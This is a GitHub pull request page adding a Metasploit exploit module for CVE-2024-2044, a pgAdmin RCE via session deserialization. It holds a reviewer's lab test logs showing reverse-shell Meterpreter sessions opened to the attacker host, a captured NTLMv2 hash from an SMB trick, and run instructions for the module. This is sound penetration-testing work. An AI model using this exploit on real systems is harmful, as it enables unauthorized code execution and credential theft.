-
Notifications
You must be signed in to change notification settings - Fork 13.7k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Add exploit for CVE-2024-2044 (pgAdmin <= 8.3 RCE) #19026
Conversation
2885144
to
a5017c1
Compare
43d1bd9
to
2e48390
Compare
2e48390
to
80a8ffd
Compare
documentation/modules/exploit/multi/http/pgadmin_session_deserialization.md
Outdated
Show resolved
Hide resolved
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Great module. Thanks for supporting both exploit techniques! A couple minor suggestions. Testing was as expected:
Unix Authenticated
msf6 exploit(multi/http/pgadmin_session_deserialization) > run
[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. pgAdmin version 8.3.0 is affected
[*] Successfully authenticated to pgAdmin
[*] Serialized payload uploaded to: /var/lib/pgadmin/storage/metasploit_gmail.com/amet.ods
[*] Triggering deserialization for path: ../storage/metasploit_gmail.com/amet.ods
[*] Sending stage (24772 bytes) to 172.16.199.131
[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.131:57444) at 2024-04-16 10:17:38 -0700
meterpreter > getuid
Server username: pgadmin
meterpreter > sysinfo
Computer : 765d0319a1ea
OS : Linux 6.2.0-35-generic #35~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Oct 6 10:23:26 UTC 2
Architecture : x64
Meterpreter : python/linux
meterpreter >
Windows Authenticated
msf6 exploit(multi/http/pgadmin_session_deserialization) > run
[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. pgAdmin version 8.3.0 is affected
[*] Successfully authenticated to pgAdmin
[*] Serialized payload uploaded to: C:\Users\msfuser\AppData\Roaming\pgAdmin\storage\metasploit_gmail.com/omnis.odt
[*] Triggering deserialization for path: ../storage/metasploit_gmail.com/omnis.odt
[*] Sending stage (24772 bytes) to 172.16.199.135
[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.135:51125) at 2024-04-16 09:23:54 -0700
meterpreter > getuid
Server username: CLIENT\msfuser
meterpreter > sysinfo
Computer : client
OS : Windows 10 (Build 19045)
Architecture : x64
System Language : en_US
Meterpreter : python/windows
meterpreter >
Windows Unauthenticated
msf6 exploit(multi/http/pgadmin_session_deserialization) > run
[*] Started reverse TCP handler on 172.16.199.1:5555
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. pgAdmin version 8.3.0 is affected
[*] Server is running. Listening on 172.16.199.1:445
[*] The SMB service has been started.
[*] Triggering deserialization for path: \\172.16.199.1\fnhlW\ZPPl
[SMB] NTLMv2-SSP Client : 172.16.199.135
[SMB] NTLMv2-SSP Username : CLIENT\msfuser
[SMB] NTLMv2-SSP Hash : msfuser::CLIENT:b7f1ecd023526627:ef207a721fee35176c118c141c94edb6:01010000000000000082c0861f90da01e6bf83043985b0b5000000000200120057004f0052004b00470052004f00550050000100120057004f0052004b00470052004f00550050000400120057004f0052004b00470052004f00550050000300120057004f0052004b00470052004f0055005000070008000082c0861f90da0106000400020000000800300030000000000000000000000000300000b7455226bdffbd4eedbd8019440e07a05e289b1820216fc4d1dadcb55556a42b0a001000000000000000000000000000000000000900220063006900660073002f003100370032002e00310036002e003100390039002e0031000000000000000000
[*] Sending stage (24772 bytes) to 172.16.199.135
[*] Meterpreter session 2 opened (172.16.199.1:5555 -> 172.16.199.135:49805) at 2024-04-16 10:00:06 -0700
[*] Server stopped.
meterpreter > getuid
Server username: CLIENT\msfuser
meterpreter > sysinfo
Computer : client
OS : Windows 10 (Build 19045)
Architecture : x64
System Language : en_US
Meterpreter : python/windows
meterpreter >
documentation/modules/exploit/multi/http/pgadmin_session_deserialization.md
Show resolved
Hide resolved
84ea514
Release NotesThis adds an exploit for pgAdmin <= 8.3 which is a path traversal vulnerability in the session management that allows a Python pickle object to be loaded and deserialized. This also adds a new Python deserialization gadget chain to execute the code in a new thread so the target application doesn't block the HTTP request. |
This adds an exploit for pgAdmin <= 8.3 which is a path traversal vulnerability in the session management that allows a Python pickle object to be loaded and deserialized. This also adds a new Python deserialization gadget chain to execute the code in a new thread so the target application doesn't block the HTTP request. I've added the source code for both the new one and the original as well to help future travelers tweak it as necessary.
Important notes from the exploit description:
This requires the changes from:
Verification
use exploit/multi/http/pgadmin_session_deserialization
RHOST
,PAYLOAD
, and optionally theUSERNAME
andPASSWORD
optionsrun